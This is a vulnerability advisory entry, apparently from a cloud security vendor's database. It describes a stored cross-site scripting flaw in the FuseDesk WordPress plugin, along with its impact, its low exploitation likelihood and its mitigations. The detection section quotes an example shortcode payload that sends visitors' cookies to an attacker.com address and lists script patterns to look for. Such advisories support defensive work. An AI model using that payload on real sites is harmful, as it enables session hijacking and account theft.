
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1914 is a Stored Cross-Site Scripting (XSS) vulnerability in the FuseDesk plugin for WordPress, affecting all versions up to and including 6.8. The flaw exists in the fusedesk_newcase shortcode due to insufficient input sanitization and output escaping on the emailtext attribute, allowing authenticated attackers with Contributor-level access or above to inject arbitrary web scripts. It was published on March 21, 2026, and assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Red Hat CVE, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The vulnerable code resides in fusedesk.php at line 561, where the emailtext attribute of the fusedesk_newcase shortcode is rendered without proper sanitization or escaping. An authenticated attacker with at least Contributor-level WordPress access can embed a malicious shortcode containing a crafted emailtext value into a post or page; when any user visits that page, the injected script executes in their browser context (Wordfence, WordPress Trac).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who visit the compromised page, potentially leading to session cookie theft, credential harvesting, defacement, or redirection to malicious sites. Because the scope is changed (S:C in CVSS), the injected script can affect users beyond the attacker's own session, including administrators. Availability is not directly impacted, but confidentiality and integrity of user sessions and site content are at risk (Red Hat CVE, Wordfence).
No public exploit code or active in-the-wild exploitation has been reported as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum a Contributor-level WordPress account, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence).
fusedesk_newcase shortcode with a malicious emailtext attribute, e.g., [fusedesk_newcase emailtext="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or REST API endpoints containing fusedesk_newcase shortcode with suspicious emailtext values including <script>, javascript:, or encoded variants.wp_posts table) containing fusedesk_newcase shortcodes with obfuscated or encoded script payloads.fusedesk_newcase shortcode.Site administrators should update the FuseDesk plugin to a version beyond 6.8 once a patched release is available from the plugin vendor. In the interim, restrict Contributor-level user registration and content publishing capabilities, or temporarily disable the FuseDesk plugin entirely. Additionally, deploying a Web Application Firewall (WAF) with XSS filtering rules can help mitigate exploitation attempts (Wordfence, Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."